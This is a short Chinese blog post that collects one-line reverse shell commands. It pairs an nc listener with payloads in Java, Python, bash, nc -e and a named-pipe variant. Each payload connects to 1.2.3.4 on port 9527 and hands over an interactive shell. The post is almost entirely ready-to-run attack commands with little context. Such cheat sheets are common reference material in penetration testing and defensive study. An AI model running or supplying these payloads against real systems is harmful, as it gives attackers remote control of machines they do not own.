各种语言的一句话反弹 shell 命令


被攻击主机先监听端口

这是大前提,至于怎么做就看 hacker 的能力了,最简单脚本可以用 nc :

nc -lvvp 9527

攻击主机连接到服务端口

JAVA

Runtime.getRuntime().exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/9527;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); 

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",9527));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

bash

bash -i >& /dev/tcp/1.2.3.4/9527 0>&1

nc

nc -e /bin/sh 1.2.3.4 9527

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 1.2.3.4 9527 1>/tmp/backpipe

文章作者: EXP
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !
 上一篇
trojan 科学上网教程 trojan 科学上网教程
trojan 简介trojan 是近两年兴起的科学上网工具,项目源码为 https://github.com/trojan-gfw。 与强调加密和混淆的SS/SSR等工具不同,trojan 将通信流量伪装成互联网上最常见的 HTTPS 流量
2020-08-28
下一篇 
威胁情报播报 威胁情报播报
从 360、奇安信、红后、绿盟、安全客、斗象 等公开来源爬取并整合最新的威胁情报信息,并实时推送到 邮箱、订阅号、QQ 群
2020-05-01
  目录